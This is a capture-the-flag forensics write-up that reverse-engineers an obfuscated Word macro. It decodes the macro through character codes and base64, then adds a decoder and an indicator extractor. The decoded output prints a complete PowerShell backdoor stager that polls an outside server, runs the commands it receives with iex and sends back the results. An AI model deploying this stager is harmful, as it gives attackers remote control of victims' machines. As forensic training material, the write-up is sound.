siunam's Website


Halloween Invitation

Background

An email notification pops up. It’s from your theater group. Someone decided to throw a party. The invitation looks awesome, but there is something suspicious about this document. Maybe you should take a look before you rent your banana costume.

Difficulty: Easy

In this challenge, we can download a file:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/Halloween-Invitation]
└─# unzip forensics_halloween_invitation.zip
Archive:  forensics_halloween_invitation.zip
  inflating: invitation.docm

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/Halloween-Invitation]
└─# file invitation.docm
invitation.docm: Microsoft Word 2007+

It’s a Microsoft Word file!

Find the flag

Let’s open it! (I’ll use LibreOffice Writer, as I’m on a Linux machine):

Looks like we’re gonna deal with macros!

In LibreOffice Writer, you can view macros by going to “Tools” -> “Macros” -> “Edit Macros”:

That’s a lot of obfuscated strings!

In the last 3 lines of this macro, we can see a PowerShell command:

Also, I’m so curious about this blob of string:

Let’s throw it to CyberChef:

It’s encoded in hex? Let’s decode that:

To decode this hex string to ASCII characters, I’ll write a simple Python script:

#!/usr/bin/env python3

# The blob is a space-separated list of character codes (int() reads each
# one as a decimal integer). chr() maps a code back to its character, and
# joining them recovers the original text. A triple-quoted string keeps
# the script valid even when the blob wraps over several lines.
unhexed = """74 65 66 122 65 68 48 65 74 119 65 51 65 68 99 65 76 103 65 51 65 68 81 65 76 103 65 120 65 68 107 65 79 65 65 117 65 68 85 65 77 103 65 54 65 68 103 65 77 65 65 52 65 68 65 65 74 119 65 55 65 67 81 65 97 81 65 57 65 67 99 65 90 65 65 48 65 68 77 65 89 103 66 106 65 71 77 65 78 103 66 107 65 67 48 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65 53 65 67 48 65 78 119 66 108 65 71 69 65 77 103 65 122 65 71 69 65 77 103 66 106 65 67 99 65 79 119 65 107 65 72 65 65 80 81 65 110 65 71 103 65 100 65 66 48 65 72 65 65 79 103 65 118 65 67 56 65 74 119 65 55 65 67 81 65 100 103 65 57 65 69 107 65 98 103 66 50 65 71 56 65 97 119 66 108 65 67 48 65 85 103 66 108 65 72 77 65 100 65 66 78 65 71 85 65 100 65 66 111 65 71 56 65 90 65 65 103 65 67 48 65 86 81 66 122 65 71 85 65 81 103 66 104 65 72 77 65 97 81 66 106 65 70 65 65 89 81 66 121 65 72 77 65 97 81 66 117 65 71 99 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 71 81 65 78 65 65 122 65 71 73 65 89 119 66 106 65 68 89 65 90 65 65 103 65 67 48 65 83 65 66 108 65 71 69 65 90 65 66 108 65 72 73 65 99 119 65 103 65 69 65 65 101 119 65 105 65 69 69 65 100 81 66 48 65 71 103 65 98 119 66 121 65 71 107 65 101 103 66 104 65 72 81 65 97 81 66 118 65 71 52 65 73 103 65 57 65 67 81 65 97 81 66 57 65 68 115 65 100 119 66 111 65 71 107 65 98 65 66 108 65 67 65 65 75 65 65 107 65 72 81 65 99 103 66 49 65 71 85 65 75 81 66 55 65 67 81 65 89 119 65 57 65 67 103 65 83 81 66 117 65 72 89 65 98 119 66 114 65 71 85 65 76 81 66 83 65 71 85 65 99 119 66 48 65 69 48 65 90 81 66 48 65 71 103 65 98 119 66 107 65 67 65 65 76 81 66 86 65 72 77 65 90 81 66 67 65 71 69 65 99 119 66 112 65 71 77 65 85 65 66 104 65 72 73 65 99 119 66 112 65 71 52 65 90 119 65 103 65 67 48 65 86 81 66 121 65 71 107 65 73 65 65 107 65 72 65 65 74 65 66 122 65 67 56 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65 53 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 
122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66 112 65 72 48 65 75 81 65 55 65 71 107 65 90 103 65 103 65 67 103 65 74 65 66 106 65 67 65 65 76 81 66 117 65 71 85 65 73 65 65 110 65 69 52 65 98 119 66 117 65 71 85 65 74 119 65 112 65 67 65 65 101 119 65 107 65 72 73 65 80 81 66 112 65 71 85 65 101 65 65 103 65 67 81 65 89 119 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 69 69 65 89 119 66 48 65 71 107 65 98 119 66 117 65 67 65 65 85 119 66 48 65 71 56 65 99 65 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 70 89 65 89 81 66 121 65 71 107 65 89 81 66 105 65 71 119 65 90 81 65 103 65 71 85 65 79 119 65 107 65 72 73 65 80 81 66 80 65 72 85 65 100 65 65 116 65 70 77 65 100 65 66 121 65 71 107 65 98 103 66 110 65 67 65 65 76 81 66 74 65 71 52 65 99 65 66 49 65 72 81 65 84 119 66 105 65 71 111 65 90 81 66 106 65 72 81 65 73 65 65 107 65 72 73 65 79 119 65 107 65 72 81 65 80 81 66 74 65 71 52 65 100 103 66 118 65 71 115 65 90 81 65 116 65 70 73 65 90 81 66 122 65 72 81 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 68 99 65 90 81 66 104 65 68 73 65 77 119 66 104 65 68 73 65 89 119 65 103 65 67 48 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 65 66 81 65 69 56 65 85 119 66 85 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66 112 65 72 48 65 73 65 65 116 65 69 73 65 98 119 66 107 65 72 107 65 73 65 65 111 65 70 115 65 85 119 66 53 65 72 77 65 100 65 66 108 65 71 48 65 76 103 66 85 65 71 85 65 101 65 66 48 65 67 52 65 82 81 66 117 65 71 77 65 98 119 66 107 65 71 107 65 98 103 66 110 65 70 48 65 79 103 65 54 65 70 85 65 86 
65 66 71 65 68 103 65 76 103 66 72 65 71 85 65 100 65 66 67 65 72 107 65 100 65 66 108 65 72 77 65 75 65 65 107 65 71 85 65 75 119 65 107 65 72 73 65 75 81 65 103 65 67 48 65 97 103 66 118 65 71 107 65 98 103 65 103 65 67 99 65 73 65 65 110 65 67 107 65 102 81 65 103 65 72 77 65 98 65 66 108 65 71 85 65 99 65 65 103 65 68 65 65 76 103 65 52 65 72 48 65 83 65 66 85 65 69 73 65 101 119 65 49 65 72 85 65 99 65 65 122 65 72 73 65 88 119 65 122 65 68 81 65 78 81 66 53 65 70 56 65 98 81 65 48 65 71 77 65 99 103 65 119 65 68 85 65 102 81 65 61"""
result = ''

# split() with no argument splits on any whitespace, including the line breaks
for i in unhexed.split():
    result += chr(int(i))

print(result)

Output:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/Halloween-Invitation]
└─# python3 hex_decode.py
JABzAD0AJwA3ADcALgA3ADQALgAxADkAOAAuADUAMgA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAZAA0ADMAYgBjAGMANgBkAC0AMAA0ADMAZgAyADQAMAA5AC0ANwBlAGEAMgAzAGEAMgBjACcAOwAkAHAAPQAnAGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGQANAAzAGIAYwBjADYAZAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMAA0ADMAZgAyADQAMAA5ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AKQA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABwACQAcwAvADcAZQBhADIAMwBhADIAYwAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0ASABUAEIAewA1AHUAcAAzAHIAXwAzADQANQB5AF8AbQA0AGMAcgAwADUAfQA=

Oh! This time we see a base64 string. Let’s decode it again:

#!/usr/bin/env python3

from base64 import b64decode

# Same blob as before: space-separated character codes that chr(int(i))
# turns back into the base64 text.
unhexed = """74 65 66 122 65 68 48 65 74 119 65 51 65 68 99 65 76 103 65 51 65 68 81 65 76 103 65 120 65 68 107 65 79 65 65 117 65 68 85 65 77 103 65 54 65 68 103 65 77 65 65 52 65 68 65 65 74 119 65 55 65 67 81 65 97 81 65 57 65 67 99 65 90 65 65 48 65 68 77 65 89 103 66 106 65 71 77 65 78 103 66 107 65 67 48 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65 53 65 67 48 65 78 119 66 108 65 71 69 65 77 103 65 122 65 71 69 65 77 103 66 106 65 67 99 65 79 119 65 107 65 72 65 65 80 81 65 110 65 71 103 65 100 65 66 48 65 72 65 65 79 103 65 118 65 67 56 65 74 119 65 55 65 67 81 65 100 103 65 57 65 69 107 65 98 103 66 50 65 71 56 65 97 119 66 108 65 67 48 65 85 103 66 108 65 72 77 65 100 65 66 78 65 71 85 65 100 65 66 111 65 71 56 65 90 65 65 103 65 67 48 65 86 81 66 122 65 71 85 65 81 103 66 104 65 72 77 65 97 81 66 106 65 70 65 65 89 81 66 121 65 72 77 65 97 81 66 117 65 71 99 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 71 81 65 78 65 65 122 65 71 73 65 89 119 66 106 65 68 89 65 90 65 65 103 65 67 48 65 83 65 66 108 65 71 69 65 90 65 66 108 65 72 73 65 99 119 65 103 65 69 65 65 101 119 65 105 65 69 69 65 100 81 66 48 65 71 103 65 98 119 66 121 65 71 107 65 101 103 66 104 65 72 81 65 97 81 66 118 65 71 52 65 73 103 65 57 65 67 81 65 97 81 66 57 65 68 115 65 100 119 66 111 65 71 107 65 98 65 66 108 65 67 65 65 75 65 65 107 65 72 81 65 99 103 66 49 65 71 85 65 75 81 66 55 65 67 81 65 89 119 65 57 65 67 103 65 83 81 66 117 65 72 89 65 98 119 66 114 65 71 85 65 76 81 66 83 65 71 85 65 99 119 66 48 65 69 48 65 90 81 66 48 65 71 103 65 98 119 66 107 65 67 65 65 76 81 66 86 65 72 77 65 90 81 66 67 65 71 69 65 99 119 66 112 65 71 77 65 85 65 66 104 65 72 73 65 99 119 66 112 65 71 52 65 90 119 65 103 65 67 48 65 86 81 66 121 65 71 107 65 73 65 65 107 65 72 65 65 74 65 66 122 65 67 56 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65 53 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 
122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66 112 65 72 48 65 75 81 65 55 65 71 107 65 90 103 65 103 65 67 103 65 74 65 66 106 65 67 65 65 76 81 66 117 65 71 85 65 73 65 65 110 65 69 52 65 98 119 66 117 65 71 85 65 74 119 65 112 65 67 65 65 101 119 65 107 65 72 73 65 80 81 66 112 65 71 85 65 101 65 65 103 65 67 81 65 89 119 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 69 69 65 89 119 66 48 65 71 107 65 98 119 66 117 65 67 65 65 85 119 66 48 65 71 56 65 99 65 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 70 89 65 89 81 66 121 65 71 107 65 89 81 66 105 65 71 119 65 90 81 65 103 65 71 85 65 79 119 65 107 65 72 73 65 80 81 66 80 65 72 85 65 100 65 65 116 65 70 77 65 100 65 66 121 65 71 107 65 98 103 66 110 65 67 65 65 76 81 66 74 65 71 52 65 99 65 66 49 65 72 81 65 84 119 66 105 65 71 111 65 90 81 66 106 65 72 81 65 73 65 65 107 65 72 73 65 79 119 65 107 65 72 81 65 80 81 66 74 65 71 52 65 100 103 66 118 65 71 115 65 90 81 65 116 65 70 73 65 90 81 66 122 65 72 81 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 68 99 65 90 81 66 104 65 68 73 65 77 119 66 104 65 68 73 65 89 119 65 103 65 67 48 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 65 66 81 65 69 56 65 85 119 66 85 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66 112 65 72 48 65 73 65 65 116 65 69 73 65 98 119 66 107 65 72 107 65 73 65 65 111 65 70 115 65 85 119 66 53 65 72 77 65 100 65 66 108 65 71 48 65 76 103 66 85 65 71 85 65 101 65 66 48 65 67 52 65 82 81 66 117 65 71 77 65 98 119 66 107 65 71 107 65 98 103 66 110 65 70 48 65 79 103 65 54 65 70 85 65 86 
65 66 71 65 68 103 65 76 103 66 72 65 71 85 65 100 65 66 67 65 72 107 65 100 65 66 108 65 72 77 65 75 65 65 107 65 71 85 65 75 119 65 107 65 72 73 65 75 81 65 103 65 67 48 65 97 103 66 118 65 71 107 65 98 103 65 103 65 67 99 65 73 65 65 110 65 67 107 65 102 81 65 103 65 72 77 65 98 65 66 108 65 71 85 65 99 65 65 103 65 68 65 65 76 103 65 52 65 72 48 65 83 65 66 85 65 69 73 65 101 119 65 49 65 72 85 65 99 65 65 122 65 72 73 65 88 119 65 122 65 68 81 65 78 81 66 53 65 70 56 65 98 81 65 48 65 71 77 65 99 103 65 119 65 68 85 65 102 81 65 61"""
result = ''

for i in unhexed.split():
    result += chr(int(i))

# The base64 payload is UTF-16LE text (every other byte is NUL), which is
# what PowerShell's -EncodedCommand expects. Decoding it as UTF-8 only
# looks right because the terminal hides the NUL bytes.
after_decode = b64decode(result).decode('utf-16-le')
print(f'After decode:\n{after_decode}')

Output:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/Halloween-Invitation]
└─# python3 hex_decode.py
After decode:
$s='77.74.198.52:8080';$i='d43bcc6d-043f2409-7ea23a2c';$p='http://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/d43bcc6d -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/043f2409 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/7ea23a2c -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}HTB{5up3r_345y_m4cr05}

We found the flag!
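The decoding chain used above (character codes, then base64) and the decoded stager, as an added example that is not part of the original write-up: one function reverses both layers and treats the result as the UTF-16LE text that PowerShell's -EncodedCommand expects (the codes are decimal, which is why chr(int(i)) works), and a second pulls out the indicators a defender would block or hunt for. The sample stager is constructed from the values shown on this page; encode_layers exists only to build that test input.

```python
#!/usr/bin/env python3
"""Layered decoder for the macro payload format seen in this write-up:
decimal character codes -> base64 -> UTF-16LE PowerShell text."""
import base64
import re


def decode_layers(codes: str) -> str:
    """Reverse the layers. The space-separated numbers are decimal character
    codes (not hex); joining them yields base64, and the decoded bytes are
    UTF-16LE, the encoding PowerShell -EncodedCommand uses. Decoding as UTF-8
    only appears to work because the NUL bytes are invisible on a terminal."""
    b64 = "".join(chr(int(n)) for n in codes.split())
    raw = base64.b64decode(b64)
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def encode_layers(script: str) -> str:
    """Forward direction: used here only to construct a test vector."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return " ".join(str(ord(c)) for c in b64)


def extract_iocs(ps: str) -> dict:
    """Pull the indicators from a stager shaped like the decoded one:
    C2 host:port ($s), the Authorization token ($i), the polled URI paths,
    and whether fetched content is executed with iex / Invoke-Expression."""
    host = re.search(r"\$s='([^']+)'", ps)
    token = re.search(r"\$i='([^']+)'", ps)
    paths = re.findall(r"\$p\$s/([0-9a-f]+)", ps)
    return {
        "c2": host.group(1) if host else None,
        "auth_token": token.group(1) if token else None,
        "paths": sorted(set(paths)),
        "uses_iex": bool(re.search(r"\biex\b|Invoke-Expression", ps, re.I)),
    }


# Constructed sample: the decoded stager from this write-up, shortened to the
# parts that carry indicators (same host, token and two of the endpoints).
SAMPLE_PS = ("$s='77.74.198.52:8080';$i='d43bcc6d-043f2409-7ea23a2c';$p='http://';"
             "$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/d43bcc6d -Headers @{\"Authorization\"=$i};"
             "while ($true){$c=(Invoke-RestMethod -Uri $p$s/043f2409);if ($c -ne 'None'){$r=iex $c}; sleep 0.8}")
SAMPLE_CODES = encode_layers(SAMPLE_PS)

if __name__ == "__main__":
    decoded = decode_layers(SAMPLE_CODES)
    print(decoded)
    print(extract_iocs(decoded))
```

The first eight codes of the page's own blob ("74 65 66 122 65 68 48 65") decode to "$s=", which is how the UTF-16LE detection was checked against real input.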

Conclusion

What we’ve learned:

  1. Reverse Engineering Word Macros